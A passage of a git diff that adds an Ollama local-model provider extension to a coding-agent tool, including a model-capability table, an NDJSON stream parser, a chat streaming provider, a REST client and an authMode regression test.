+			name: m.name,
+			reasoning: m.reasoning,
+			input: m.input,
+			cost: m.cost,
+			contextWindow: m.contextWindow,
+			maxTokens: m.maxTokens,
+			providerOptions: (m.ollamaOptions ?? {}) as Record<string, unknown>,
+		})),
+	});
+
+	providerRegistered = true;
+	return true;
+}
+
+export default function ollama(pi: ExtensionAPI) {
+	// Register slash commands immediately (they check Ollama availability themselves)
+	registerOllamaCommands(pi);
+
+	pi.on("session_start", async (_event, ctx) => {
+		// Register tool (deferred to avoid blocking startup)
+		if (ctx.hasUI) {
+			void registerOllamaTools(pi).catch((error) => {
+				ctx.ui.notify(
+					`Ollama tool failed to load: ${error instanceof Error ? error.message : String(error)}`,
+					"warning",
+				);
+			});
+		} else {
+			await registerOllamaTools(pi);
+		}
+
+		// In headless/auto mode, await the probe so the fallback resolver can
+		// see Ollama before the first LLM call (#3531 race condition).
+		// In interactive mode, keep it async for fast startup.
+		if (!ctx.hasUI) {
+			try {
+				await probeAndRegister(pi);
+			} catch { /* non-fatal */ }
+		} else {
+			probeAndRegister(pi)
+				.then((found) => {
+					if (found) ctx.ui.setStatus("ollama", "Ollama");
+				})
+				.catch(() => {});
+		}
+	});
+
+	pi.on("session_shutdown", async () => {
+		if (providerRegistered) {
+			pi.unregisterProvider("ollama");
+			providerRegistered = false;
+		}
+		toolsPromise = null;
+	});
+}
diff --git a/src/resources/extensions/ollama/model-capabilities.ts b/src/resources/extensions/ollama/model-capabilities.ts
new file mode 100644
index 000000000..f44506fbf
--- /dev/null
+++ b/src/resources/extensions/ollama/model-capabilities.ts
@@ -0,0 +1,152 @@
+// GSD2 — Known model capability table for Ollama models
+
+/**
+ * Maps well-known Ollama model families to their capabilities.
+ * Used to enrich auto-discovered models with accurate context windows,
+ * vision support, and reasoning detection.
+ *
+ * Fallback: estimate from parameter count if model isn't in the table.
+ */
+
+import type { OllamaChatOptions } from "./types.js";
+
+export interface ModelCapability {
+	contextWindow?: number;
+	maxTokens?: number;
+	input?: ("text" | "image")[];
+	reasoning?: boolean;
+	/** Ollama-specific default inference options for this model family. */
+	ollamaOptions?: OllamaChatOptions;
+}
+
+/**
+ * Known model family capabilities.
+ * Keys are matched as prefixes against the model name (before the colon/tag).
+ * More specific entries should appear first.
+ */
+// Note: ollamaOptions.num_ctx is set for known model families where the context
+// window is authoritative. For unknown/estimated models, num_ctx is NOT sent
+// to avoid OOM risk — Ollama uses its own safe default instead.
+const KNOWN_MODELS: Array<[pattern: string, caps: ModelCapability]> = [
+	// ─── Reasoning models ───────────────────────────────────────────────
+	["deepseek-r1", { contextWindow: 131072, reasoning: true, ollamaOptions: { num_ctx: 131072 } }],
+	["qwq", { contextWindow: 131072, reasoning: true, ollamaOptions: { num_ctx: 131072 } }],
+
+	// ─── Vision models ──────────────────────────────────────────────────
+	["llava", { contextWindow: 4096, input: ["text", "image"], ollamaOptions: { num_ctx: 4096 } }],
+	["bakllava", { contextWindow: 4096, input: ["text", "image"], ollamaOptions: { num_ctx: 4096 } }],
+	["moondream", { contextWindow: 8192, input: ["text", "image"], ollamaOptions: { num_ctx: 8192 } }],
+	["llama3.2-vision", { contextWindow: 131072, input: ["text", "image"], ollamaOptions: { num_ctx: 131072 } }],
+	["minicpm-v", { contextWindow: 4096, input: ["text", "image"], ollamaOptions: { num_ctx: 4096 } }],
+
+	// ─── Code models ────────────────────────────────────────────────────
+	["codestral", { contextWindow: 262144, maxTokens: 32768, ollamaOptions: { num_ctx: 262144 } }],
+	["qwen2.5-coder", { contextWindow: 131072, maxTokens: 32768, ollamaOptions: { num_ctx: 131072 } }],
+	["deepseek-coder-v2", { contextWindow: 131072, maxTokens: 16384, ollamaOptions: { num_ctx: 131072 } }],
+	["starcoder2", { contextWindow: 16384, maxTokens: 8192, ollamaOptions: { num_ctx: 16384 } }],
+	["codegemma", { contextWindow: 8192, maxTokens: 8192, ollamaOptions: { num_ctx: 8192 } }],
+	["codellama", { contextWindow: 16384, maxTokens: 8192, ollamaOptions: { num_ctx: 16384 } }],
+	["devstral", { contextWindow: 131072, maxTokens: 32768, ollamaOptions: { num_ctx: 131072 } }],
+
+	// ─── Llama family ───────────────────────────────────────────────────
+	["llama3.3", { contextWindow: 131072, maxTokens: 16384, ollamaOptions: { num_ctx: 131072 } }],
+	["llama3.2", { contextWindow: 131072, maxTokens: 16384, ollamaOptions: { num_ctx: 131072 } }],
+	["llama3.1", { contextWindow: 131072, maxTokens: 16384, ollamaOptions: { num_ctx: 131072 } }],
+	["llama3", { contextWindow: 8192, maxTokens: 8192, ollamaOptions: { num_ctx: 8192 } }],
+	["llama2", { contextWindow: 4096, maxTokens: 4096, ollamaOptions: { num_ctx: 4096 } }],
+
+	// ─── Qwen family ────────────────────────────────────────────────────
+	["qwen3", { contextWindow: 131072, maxTokens: 32768, ollamaOptions: { num_ctx: 131072 } }],
+	["qwen2.5", { contextWindow: 131072, maxTokens: 32768, ollamaOptions: { num_ctx: 131072 } }],
+	["qwen2", { contextWindow: 131072, maxTokens: 32768, ollamaOptions: { num_ctx: 131072 } }],
+
+	// ─── Gemma family ───────────────────────────────────────────────────
+	["gemma3", { contextWindow: 131072, maxTokens: 16384, ollamaOptions: { num_ctx: 131072 } }],
+	["gemma2", { contextWindow: 8192, maxTokens: 8192, ollamaOptions: { num_ctx: 8192 } }],
+
+	// ─── Mistral family ─────────────────────────────────────────────────
+	["mistral-large", { contextWindow: 131072, maxTokens: 16384, ollamaOptions: { num_ctx: 131072 } }],
+	["mistral-small", { contextWindow: 131072, maxTokens: 16384, ollamaOptions: { num_ctx: 131072 } }],
+	["mistral-nemo", { contextWindow: 131072, maxTokens: 16384, ollamaOptions: { num_ctx: 131072 } }],
+	["mistral", { contextWindow: 32768, maxTokens: 8192, ollamaOptions: { num_ctx: 32768 } }],
+	["mixtral", { contextWindow: 32768, maxTokens: 8192, ollamaOptions: { num_ctx: 32768 } }],
+
+	// ─── Phi family ─────────────────────────────────────────────────────
+	["phi4", { contextWindow: 16384, maxTokens: 16384, ollamaOptions: { num_ctx: 16384 } }],
+	["phi3.5", { contextWindow: 131072, maxTokens: 16384, ollamaOptions: { num_ctx: 131072 } }],
+	["phi3", { contextWindow: 131072, maxTokens: 4096, ollamaOptions: { num_ctx: 131072 } }],
+
+	// ─── Command R ──────────────────────────────────────────────────────
+	["command-r-plus", { contextWindow: 131072, maxTokens: 16384, ollamaOptions: { num_ctx: 131072 } }],
+	["command-r", { contextWindow: 131072, maxTokens: 16384, ollamaOptions: { num_ctx: 131072 } }],
+];
+
+/**
+ * Look up capabilities for a model by name.
+ * Matches the longest prefix from the known models table.
+ */
+export function getModelCapabilities(modelName: string): ModelCapability {
+	// Strip tag (everything after the colon) for matching
+	const baseName = modelName.split(":")[0].toLowerCase();
+
+	for (const [pattern, caps] of KNOWN_MODELS) {
+		if (baseName === pattern || baseName.startsWith(pattern)) {
+			return caps;
+		}
+	}
+
+	return {};
+}
+
+/**
+ * Estimate context window from parameter size string (e.g. "7B", "70B", "1.5B").
+ * Used as fallback when model isn't in the known table.
+ */
+export function estimateContextFromParams(parameterSize: string): number {
+	const match = parameterSize.match(/([\d.]+)\s*([BbMm])/);
+	if (!match) return 8192;
+
+	const size = parseFloat(match[1]);
+	const unit = match[2].toUpperCase();
+
+	// Convert to billions
+	const billions = unit === "M" ? size / 1000 : size;
+
+	// Rough heuristics: larger models tend to support larger contexts
+	if (billions >= 70) return 131072;
+	if (billions >= 30) return 65536;
+	if (billions >= 13) return 32768;
+	if (billions >= 7) return 16384;
+	return 8192;
+}
+
+/**
+ * Humanize a model name for display (e.g. "llama3.1:8b" → "Llama 3.1 8B").
+ */
+export function humanizeModelName(modelName: string): string {
+	const [base, tag] = modelName.split(":");
+
+	// Capitalize first letter, add spaces around version numbers
+	let name = base
+		.replace(/([a-z])(\d)/g, "$1 $2")
+		.replace(/(\d)([a-z])/g, "$1 $2")
+		.replace(/^./, (c) => c.toUpperCase());
+
+	// Clean up common patterns
+	name = name.replace(/\s*-\s*/g, " ");
+
+	if (tag && tag !== "latest") {
+		name += ` ${tag.toUpperCase()}`;
+	}
+
+	return name;
+}
+
+/**
+ * Format byte size for display (e.g. 4700000000 → "4.7 GB").
+ */
+export function formatModelSize(bytes: number): string {
+	if (bytes >= 1e9) return `${(bytes / 1e9).toFixed(1)} GB`;
+	if (bytes >= 1e6) return `${(bytes / 1e6).toFixed(1)} MB`;
+	return `${(bytes / 1e3).toFixed(0)} KB`;
+}
diff --git a/src/resources/extensions/ollama/ndjson-stream.ts b/src/resources/extensions/ollama/ndjson-stream.ts
new file mode 100644
index 000000000..32065aa4e
--- /dev/null
+++ b/src/resources/extensions/ollama/ndjson-stream.ts
@@ -0,0 +1,63 @@
+// GSD2 — Ollama Extension: NDJSON streaming parser
+
+/**
+ * Parses a streaming NDJSON (newline-delimited JSON) response body into
+ * typed objects. Used for Ollama's /api/chat and /api/pull endpoints.
+ *
+ * @param strict When true, malformed JSON lines throw instead of being skipped.
+ *   Use strict mode for inference streams where silent data loss is unacceptable.
+ *   Use permissive mode (default) for progress endpoints like /api/pull.
+ */
+
+export async function* parseNDJsonStream<T>(
+	body: ReadableStream<Uint8Array>,
+	signal?: AbortSignal,
+	strict = false,
+): AsyncGenerator<T> {
+	const reader = body.getReader();
+	const decoder = new TextDecoder();
+	let buffer = "";
+
+	try {
+		while (true) {
+			if (signal?.aborted) break;
+
+			const { done, value } = await reader.read();
+			if (done) break;
+
+			buffer += decoder.decode(value, { stream: true });
+			const lines = buffer.split("\n");
+			buffer = lines.pop() ?? "";
+
+			for (const line of lines) {
+				const trimmed = line.trim();
+				if (!trimmed) continue;
+				try {
+					yield JSON.parse(trimmed) as T;
+				} catch (err) {
+					if (strict) {
+						throw new Error(
+							`Malformed NDJSON line from Ollama: ${trimmed.slice(0, 200)}`,
+						);
+					}
+					// Permissive mode: skip malformed lines
+				}
+			}
+		}
+
+		// Flush remaining buffer (skip if aborted)
+		if (buffer.trim() && !signal?.aborted) {
+			try {
+				yield JSON.parse(buffer.trim()) as T;
+			} catch (err) {
+				if (strict) {
+					throw new Error(
+						`Malformed NDJSON line from Ollama: ${buffer.trim().slice(0, 200)}`,
+					);
+				}
+			}
+		}
+	} finally {
+		reader.releaseLock();
+	}
+}
diff --git a/src/resources/extensions/ollama/ollama-auth-mode.test.ts b/src/resources/extensions/ollama/ollama-auth-mode.test.ts
new file mode 100644
index 000000000..e74f2e76c
--- /dev/null
+++ b/src/resources/extensions/ollama/ollama-auth-mode.test.ts
@@ -0,0 +1,20 @@
+/**
+ * Regression test for #3440: Ollama extension must register with
+ * authMode "apiKey" (not "none") to avoid streamSimple requirement.
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+test("Ollama registers with authMode apiKey, not none (#3440)", () => {
+  const src = readFileSync(join(__dirname, "index.ts"), "utf-8");
+  // Find the registerProvider call
+  const registerBlock = src.slice(src.indexOf("pi.registerProvider(\"ollama\""));
+  const authLine = registerBlock.match(/authMode:\s*"(\w+)"/);
+  assert.ok(authLine, "registerProvider must specify authMode");
+  assert.equal(authLine![1], "apiKey", "authMode must be apiKey, not none");
+});
diff --git a/src/resources/extensions/ollama/ollama-chat-provider.ts b/src/resources/extensions/ollama/ollama-chat-provider.ts
new file mode 100644
index 000000000..81e1de6f4
--- /dev/null
+++ b/src/resources/extensions/ollama/ollama-chat-provider.ts
@@ -0,0 +1,459 @@
+// GSD2 — Ollama Extension: Native /api/chat stream provider
+
+/**
+ * Implements the "ollama-chat" API provider, streaming responses directly
+ * from Ollama's native /api/chat endpoint instead of the OpenAI compatibility
+ * shim. This exposes Ollama-specific options (num_ctx, keep_alive, num_gpu,
+ * sampling parameters) and surfaces inference performance metrics.
+ */
+
+import {
+	type Api,
+	type AssistantMessage,
+	type AssistantMessageEvent,
+	type AssistantMessageEventStream,
+	type Context,
+	type ImageContent,
+	type InferenceMetrics,
+	type Message,
+	type Model,
+	type SimpleStreamOptions,
+	type StopReason,
+	type TextContent,
+	type ThinkingContent,
+	type Tool,
+	type ToolCall,
+	type Usage,
+	EventStream,
+} from "@gsd/pi-ai";
+import { chat } from "./ollama-client.js";
+import type {
+	OllamaChatMessage,
+	OllamaChatOptions,
+	OllamaChatRequest,
+	OllamaChatResponse,
+	OllamaTool,
+	OllamaToolCall,
+} from "./types.js";
+import { ThinkingTagParser, type ParsedChunk } from "./thinking-parser.js";
+
+/** Create an AssistantMessageEventStream using the base EventStream class. */
+function createStream(): AssistantMessageEventStream {
+	return new EventStream<AssistantMessageEvent, AssistantMessage>(
+		(event) => event.type === "done" || event.type === "error",
+		(event) => {
+			if (event.type === "done") return event.message;
+			if (event.type === "error") return event.error;
+			throw new Error("Unexpected event type for final result");
+		},
+	) as AssistantMessageEventStream;
+}
+
+// ─── Stream handler ─────────────────────────────────────────────────────────
+
+export function streamOllamaChat(
+	model: Model<Api>,
+	context: Context,
+	options?: SimpleStreamOptions,
+): AssistantMessageEventStream {
+	const stream = createStream();
+
+	(async () => {
+		const output = buildInitialOutput(model);
+
+		try {
+			const request = buildRequest(model, context, options);
+			stream.push({ type: "start", partial: output });
+
+			const useThinkingParser = model.reasoning;
+			const thinkParser = useThinkingParser ? new ThinkingTagParser() : null;
+
+			let contentIndex = -1;
+			let currentBlockType: "text" | "thinking" | null = null;
+
+			function startBlock(type: "text" | "thinking") {
+				contentIndex++;
+				currentBlockType = type;
+				if (type === "text") {
+					output.content.push({ type: "text", text: "" });
+					stream.push({ type: "text_start", contentIndex, partial: output });
+				} else {
+					output.content.push({ type: "thinking", thinking: "" });
+					stream.push({ type: "thinking_start", contentIndex, partial: output });
+				}
+			}
+
+			function endBlock() {
+				if (currentBlockType === null) return;
+				if (currentBlockType === "text") {
+					const block = output.content[contentIndex] as TextContent;
+					stream.push({ type: "text_end", contentIndex, content: block.text, partial: output });
+				} else {
+					const block = output.content[contentIndex] as ThinkingContent;
+					stream.push({ type: "thinking_end", contentIndex, content: block.thinking, partial: output });
+				}
+				currentBlockType = null;
+			}
+
+			function emitDelta(type: "text" | "thinking", text: string) {
+				if (!text) return;
+				if (currentBlockType !== type) {
+					endBlock();
+					startBlock(type);
+				}
+				if (type === "text") {
+					(output.content[contentIndex] as TextContent).text += text;
+					stream.push({ type: "text_delta", contentIndex, delta: text, partial: output });
+				} else {
+					(output.content[contentIndex] as ThinkingContent).thinking += text;
+					stream.push({ type: "thinking_delta", contentIndex, delta: text, partial: output });
+				}
+			}
+
+			function processChunks(chunks: ParsedChunk[]) {
+				for (const chunk of chunks) {
+					emitDelta(chunk.type, chunk.text);
+				}
+			}
+
+			function processToolCalls(toolCalls: OllamaToolCall[]) {
+				endBlock();
+				for (const tc of toolCalls) {
+					contentIndex++;
+					const toolCall: ToolCall = {
+						type: "toolCall",
+						id: `ollama_tc_${contentIndex}`,
+						name: tc.function.name,
+						arguments: tc.function.arguments,
+					};
+					output.content.push(toolCall);
+					stream.push({ type: "toolcall_start", contentIndex, partial: output });
+					// Emit a delta with the serialized arguments (convention: start/delta/end)
+					stream.push({
+						type: "toolcall_delta",
+						contentIndex,
+						delta: JSON.stringify(tc.function.arguments),
+						partial: output,
+					});
+					stream.push({
+						type: "toolcall_end",
+						contentIndex,
+						toolCall,
+						partial: output,
+					});
+				}
+				output.stopReason = "toolUse";
+			}
+
+			for await (const chunk of chat(request, options?.signal)) {
+				// Handle text content — process independently of tool_calls
+				// (a chunk may contain both content and tool_calls)
+				const content = chunk.message?.content ?? "";
+				if (content) {
+					if (thinkParser) {
+						processChunks(thinkParser.push(content));
+					} else {
+						emitDelta("text", content);
+					}
+				}
+
+				// Handle tool calls (Ollama sends them complete, may be on done:true chunk)
+				if (chunk.message?.tool_calls?.length) {
+					processToolCalls(chunk.message.tool_calls);
+				}
+
+				if (chunk.done) {
+					// Final chunk — extract metrics and usage
+					if (thinkParser) processChunks(thinkParser.flush());
+					endBlock();
+
+					output.usage = buildUsage(chunk);
+					output.inferenceMetrics = extractMetrics(chunk);
+					// Preserve "toolUse" if tool calls were processed
+					if (output.stopReason !== "toolUse") {
+						output.stopReason = mapStopReason(chunk.done_reason);
+					}
+					break;
+				}
+			}
+
+			assertStreamSuccess(output, options?.signal);
+			finalizeStream(stream, output);
+		} catch (error) {
+			handleStreamError(stream, output, error, options?.signal);
+		}
+	})();
+
+	return stream;
+}
+
+// ─── Request building ───────────────────────────────────────────────────────
+
+function buildRequest(
+	model: Model<Api>,
+	context: Context,
+	options?: SimpleStreamOptions,
+): OllamaChatRequest {
+	const ollamaOpts = (model.providerOptions ?? {}) as OllamaChatOptions;
+
+	const request: OllamaChatRequest = {
+		model: model.id,
+		messages: convertMessages(context),
+		stream: true,
+	};
+
+	// Build options block with all Ollama-specific parameters
+	const reqOptions: NonNullable<OllamaChatRequest["options"]> = {};
+
+	// Context window — only sent when explicitly configured via providerOptions.
+	// Sending inferred/estimated values risks OOM on constrained hosts.
+	// Users can set num_ctx per-model in models.json ollamaOptions or the
+	// capability table can provide it for known model families.
+	if (ollamaOpts.num_ctx !== undefined && ollamaOpts.num_ctx > 0) {
+		reqOptions.num_ctx = ollamaOpts.num_ctx;
+	}
+
+	// Max output tokens
+	const maxTokens = options?.maxTokens ?? model.maxTokens;
+	if (maxTokens > 0) {
+		reqOptions.num_predict = maxTokens;
+	}
+
+	// Temperature
+	if (options?.temperature !== undefined) {
+		reqOptions.temperature = options.temperature;
+	}
+
+	// Per-model sampling options from providerOptions
+	if (ollamaOpts.top_p !== undefined) reqOptions.top_p = ollamaOpts.top_p;
+	if (ollamaOpts.top_k !== undefined) reqOptions.top_k = ollamaOpts.top_k;
+	if (ollamaOpts.repeat_penalty !== undefined) reqOptions.repeat_penalty = ollamaOpts.repeat_penalty;
+	if (ollamaOpts.seed !== undefined) reqOptions.seed = ollamaOpts.seed;
+	if (ollamaOpts.num_gpu !== undefined) reqOptions.num_gpu = ollamaOpts.num_gpu;
+
+	if (Object.keys(reqOptions).length > 0) {
+		request.options = reqOptions;
+	}
+
+	// Keep alive
+	if (ollamaOpts.keep_alive !== undefined) {
+		request.keep_alive = ollamaOpts.keep_alive;
+	}
+
+	// Tools
+	if (context.tools?.length) {
+		request.tools = convertTools(context.tools);
+	}
+
+	return request;
+}
+
+// ─── Message conversion ─────────────────────────────────────────────────────
+
+function convertMessages(context: Context): OllamaChatMessage[] {
+	const messages: OllamaChatMessage[] = [];
+
+	// System prompt
+	if (context.systemPrompt) {
+		messages.push({ role: "system", content: context.systemPrompt });
+	}
+
+	for (const msg of context.messages) {
+		switch (msg.role) {
+			case "user":
+				messages.push(convertUserMessage(msg));
+				break;
+			case "assistant":
+				messages.push(convertAssistantMessage(msg));
+				break;
+			case "toolResult":
+				messages.push({
+					role: "tool",
+					content: msg.content
+						.filter((c): c is TextContent => c.type === "text")
+						.map((c) => c.text)
+						.join("\n"),
+					name: msg.toolName,
+				});
+				break;
+		}
+	}
+
+	return messages;
+}
+
+function convertUserMessage(msg: Message & { role: "user" }): OllamaChatMessage {
+	if (typeof msg.content === "string") {
+		return { role: "user", content: msg.content };
+	}
+
+	const textParts: string[] = [];
+	const images: string[] = [];
+
+	for (const part of msg.content) {
+		if (part.type === "text") {
+			textParts.push(part.text);
+		} else if (part.type === "image") {
+			// Strip data URI prefix if present
+			let data = (part as ImageContent).data;
+			const commaIdx = data.indexOf(",");
+			if (commaIdx !== -1 && data.startsWith("data:")) {
+				data = data.slice(commaIdx + 1);
+			}
+			images.push(data);
+		}
+	}
+
+	const result: OllamaChatMessage = {
+		role: "user",
+		content: textParts.join("\n"),
+	};
+	if (images.length > 0) {
+		result.images = images;
+	}
+	return result;
+}
+
+function convertAssistantMessage(msg: Message & { role: "assistant" }): OllamaChatMessage {
+	let content = "";
+	const toolCalls: OllamaChatMessage["tool_calls"] = [];
+
+	for (const block of msg.content) {
+		if (block.type === "thinking") {
+			// Serialize thinking back inline for round-trip with Ollama
+			content += `<think>${(block as ThinkingContent).thinking}</think>`;
+		} else if (block.type === "text") {
+			content += (block as TextContent).text;
+		} else if (block.type === "toolCall") {
+			const tc = block as ToolCall;
+			toolCalls.push({
+				function: {
+					name: tc.name,
+					arguments: tc.arguments,
+				},
+			});
+		}
+	}
+
+	const result: OllamaChatMessage = { role: "assistant", content };
+	if (toolCalls.length > 0) {
+		result.tool_calls = toolCalls;
+	}
+	return result;
+}
+
+// ─── Tool conversion ────────────────────────────────────────────────────────
+
+function convertTools(tools: Tool[]): OllamaTool[] {
+	return tools.map((tool) => {
+		const params = tool.parameters as Record<string, unknown>;
+		return {
+			type: "function" as const,
+			function: {
+				name: tool.name,
+				description: tool.description,
+				parameters: {
+					type: "object" as const,
+					required: params.required as string[] | undefined,
+					properties: (params.properties as Record<string, unknown>) ?? {},
+				},
+			},
+		};
+	});
+}
+
+// ─── Response mapping ───────────────────────────────────────────────────────
+
+function mapStopReason(doneReason?: string): StopReason {
+	switch (doneReason) {
+		case "stop":
+			return "stop";
+		case "length":
+			return "length";
+		default:
+			return "stop";
+	}
+}
+
+function buildUsage(chunk: OllamaChatResponse): Usage {
+	const input = chunk.prompt_eval_count ?? 0;
+	const outputTokens = chunk.eval_count ?? 0;
+	return {
+		input,
+		output: outputTokens,
+		cacheRead: 0,
+		cacheWrite: 0,
+		totalTokens: input + outputTokens,
+		cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 },
+	};
+}
+
+function extractMetrics(chunk: OllamaChatResponse): InferenceMetrics | undefined {
+	if (!chunk.eval_duration && !chunk.total_duration) return undefined;
+
+	const evalCount = chunk.eval_count ?? 0;
+	const evalDurationNs = chunk.eval_duration ?? 0;
+	const evalDurationMs = evalDurationNs / 1e6;
+	const tokensPerSecond = evalDurationNs > 0 ? evalCount / (evalDurationNs / 1e9) : 0;
+
+	return {
+		tokensPerSecond,
+		totalDurationMs: (chunk.total_duration ?? 0) / 1e6,
+		evalDurationMs,
+		promptEvalDurationMs: (chunk.prompt_eval_duration ?? 0) / 1e6,
+	};
+}
+
+// ─── Stream lifecycle helpers ───────────────────────────────────────────────
+// Replicated from openai-shared.ts (not exported from @gsd/pi-ai)
+
+function buildInitialOutput(model: Model<Api>): AssistantMessage {
+	return {
+		role: "assistant",
+		content: [],
+		api: model.api as Api,
+		provider: model.provider,
+		model: model.id,
+		usage: {
+			input: 0,
+			output: 0,
+			cacheRead: 0,
+			cacheWrite: 0,
+			totalTokens: 0,
+			cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 },
+		},
+		stopReason: "stop",
+		timestamp: Date.now(),
+	};
+}
+
+function assertStreamSuccess(output: AssistantMessage, signal?: AbortSignal): void {
+	if (signal?.aborted) {
+		throw new Error("Request was aborted");
+	}
+	if (output.stopReason === "aborted" || output.stopReason === "error") {
+		throw new Error("An unknown error occurred");
+	}
+}
+
+function finalizeStream(stream: AssistantMessageEventStream, output: AssistantMessage): void {
+	stream.push({
+		type: "done",
+		reason: output.stopReason as Extract<StopReason, "stop" | "length" | "toolUse" | "pauseTurn">,
+		message: output,
+	});
+	stream.end();
+}
+
+function handleStreamError(
+	stream: AssistantMessageEventStream,
+	output: AssistantMessage,
+	error: unknown,
+	signal?: AbortSignal,
+): void {
+	for (const block of output.content) delete (block as { index?: number }).index;
+	output.stopReason = signal?.aborted ? "aborted" : "error";
+	output.errorMessage = error instanceof Error ? error.message : JSON.stringify(error);
+	stream.push({ type: "error", reason: output.stopReason, error: output });
+	stream.end();
+}
diff --git a/src/resources/extensions/ollama/ollama-client.ts b/src/resources/extensions/ollama/ollama-client.ts
new file mode 100644
index 000000000..4738c09da
--- /dev/null
+++ b/src/resources/extensions/ollama/ollama-client.ts
@@ -0,0 +1,196 @@
+// GSD2 — HTTP client for Ollama REST API
+
+/**
+ * Low-level HTTP client for the Ollama REST API.
+ * Respects the OLLAMA_HOST environment variable for non-default endpoints.
+ *
+ * Reference: https://github.com/ollama/ollama/blob/main/docs/api.md
+ */
+
+import type {
+	OllamaChatRequest,
+	OllamaChatResponse,
+	OllamaPsResponse,
+	OllamaPullProgress,
+	OllamaShowResponse,
+	OllamaTagsResponse,
+	OllamaVersionResponse,
+} from "./types.js";
+import { parseNDJsonStream } from "./ndjson-stream.js";
+
+const DEFAULT_HOST = "http://localhost:11434";
+const PROBE_TIMEOUT_MS = 1500;
+const REQUEST_TIMEOUT_MS = 10000;
+
+/**
+ * Get the Ollama host URL from OLLAMA_HOST or default.
+ */
+export function getOllamaHost(): string {
+	const host = process.env.OLLAMA_HOST;
+	if (!host) return DEFAULT_HOST;
+
+	// OLLAMA_HOST can be just a host:port without scheme
+	if (host.startsWith("http://") || host.startsWith("https://")) return host;
+	return `http://${host}`;
+}
+
+async function fetchWithTimeout(url: string, options: RequestInit = {}, timeoutMs = REQUEST_TIMEOUT_MS): Promise<Response> {
+	const controller = new AbortController();
+	const timeout = setTimeout(() => controller.abort(), timeoutMs);
+	try {
+		return await fetch(url, { ...options, signal: controller.signal });
+	} finally {
+		clearTimeout(timeout);
+	}
+}
+
+/**
+ * Check if Ollama is running and reachable.
+ */
+export async function isRunning(): Promise<boolean> {
+	try {
+		const response = await fetchWithTimeout(`${getOllamaHost()}/`, {}, PROBE_TIMEOUT_MS);
+		return response.ok;
+	} catch {
+		return false;
+	}
+}
+
+/**
+ * Get Ollama version.
+ */
+export async function getVersion(): Promise<string | null> {
+	try {
+		const response = await fetchWithTimeout(`${getOllamaHost()}/api/version`);
+		if (!response.ok) return null;
+		const data = (await response.json()) as OllamaVersionResponse;
+		return data.version;
+	} catch {
+		return null;
+	}
+}
+
+/**
+ * List all locally available models.
+ */
+export async function listModels(): Promise<OllamaTagsResponse> {
+	const response = await fetchWithTimeout(`${getOllamaHost()}/api/tags`);
+	if (!response.ok) {
+		throw new Error(`Ollama /api/tags returned ${response.status}: ${response.statusText}`);
+	}
+	return (await response.json()) as OllamaTagsResponse;
+}
+
+/**
+ * Get detailed information about a specific model.
+ */
+export async function showModel(name: string): Promise<OllamaShowResponse> {
+	const response = await fetchWithTimeout(`${getOllamaHost()}/api/show`, {
+		method: "POST",
+		headers: { "Content-Type": "application/json" },
+		body: JSON.stringify({ name }),
+	});
+	if (!response.ok) {
+		throw new Error(`Ollama /api/show returned ${response.status}: ${response.statusText}`);
+	}
+	return (await response.json()) as OllamaShowResponse;
+}
+
+/**
+ * List currently loaded/running models.
+ */
+export async function getRunningModels(): Promise<OllamaPsResponse> {
+	const response = await fetchWithTimeout(`${getOllamaHost()}/api/ps`);
+	if (!response.ok) {
+		throw new Error(`Ollama /api/ps returned ${response.status}: ${response.statusText}`);
+	}
+	return (await response.json()) as OllamaPsResponse;
+}
+
+/**
+ * Pull a model with streaming progress.
+ * Calls onProgress for each progress update.
+ * Returns when the pull is complete.
+ */
+export async function pullModel(
+	name: string,
+	onProgress?: (progress: OllamaPullProgress) => void,
+	signal?: AbortSignal,
+): Promise<void> {
+	const response = await fetch(`${getOllamaHost()}/api/pull`, {
+		method: "POST",
+		headers: { "Content-Type": "application/json" },
+		body: JSON.stringify({ name, stream: true }),
+		signal,
+	});
+
+	if (!response.ok) {
+		const text = await response.text();
+		throw new Error(`Ollama /api/pull returned ${response.status}: ${text}`);
+	}
+
+	if (!response.body) {
+		throw new Error("Ollama /api/pull returned no body");
+	}
+
+	for await (const progress of parseNDJsonStream<OllamaPullProgress>(response.body, signal)) {
+		onProgress?.(progress);
+	}
+}
+
+/**
+ * Stream a chat completion via /api/chat.
+ * Returns an async generator yielding each NDJSON response chunk.
+ */
+export async function* chat(
+	request: OllamaChatRequest,
+	signal?: AbortSignal,
+): AsyncGenerator<OllamaChatResponse> {
+	const response = await fetch(`${getOllamaHost()}/api/chat`, {
+		method: "POST",
+		headers: { "Content-Type": "application/json" },
+		body: JSON.stringify(request),
+		signal,
+	});
+
+	if (!response.ok) {
+		const text = await response.text();
+		throw new Error(`Ollama /api/chat returned ${response.status}: ${text}`);
+	}
+
+	if (!response.body) {
+		throw new Error("Ollama /api/chat returned no body");
+	}
+
+	yield* parseNDJsonStream<OllamaChatResponse>(response.body, signal, true);
+}
+
+/**
+ * Delete a local model.
+ */
+export async function deleteModel(name: string): Promise<void> {
+	const response = await fetchWithTimeout(`${getOllamaHost()}/api/delete`, {
+		method: "DELETE",
+		headers: { "Content-Type": "application/json" },
+		body: JSON.stringify({ name }),
+	});
+	if (!response.ok) {
+		const text = await response.text();
+		throw new Error(`Ollama /api/delete returned ${response.status}: ${text}`);
+	}
+}
+
+/**
+ * Copy a model to a new name.
+ */
+export async function copyModel(source: string, destination: string): Promise<void> {
+	const response = await fetchWithTimeout(`${getOllamaHost()}/api/copy`, {
+		method: "POST",
+		headers: { "Content-Type": "application/json" },
+		body: JSON.stringify({ source, destination }),
+	});
+	if (!response.ok) {
+		const text = await response.text();
+		throw new Error(`Ollama /api/copy returned ${response.status}: ${text}`);
+	}
+}
diff --git a/src/resources/extensions/ollama/ollama-commands.ts b/src/resources/extensions/ollama/ollama-commands.ts
new file mode 100644
index 000000000..81322c784
--- /dev/null
+++ b/src/resources/extensions/ollama/ollama-commands.ts
@@ -0,0 +1,248 @@
+// GSD2 — Ollama slash commands
+
+/**
+ * Registers /ollama slash commands for managing local Ollama models.
+ *
+ * Commands:
+ *   /ollama          — Show status (running?, version, loaded models)
+ *   /ollama list     — List all available local models with sizes
+ *   /ollama pull     — Pull a model with progress
+ *   /ollama remove   — Delete a local model
+ *   /ollama ps       — Show running models and resource usage
+ */
+
+import type { ExtensionAPI } from "@gsd/pi-coding-agent";
+import { Text } from "@gsd/pi-tui";
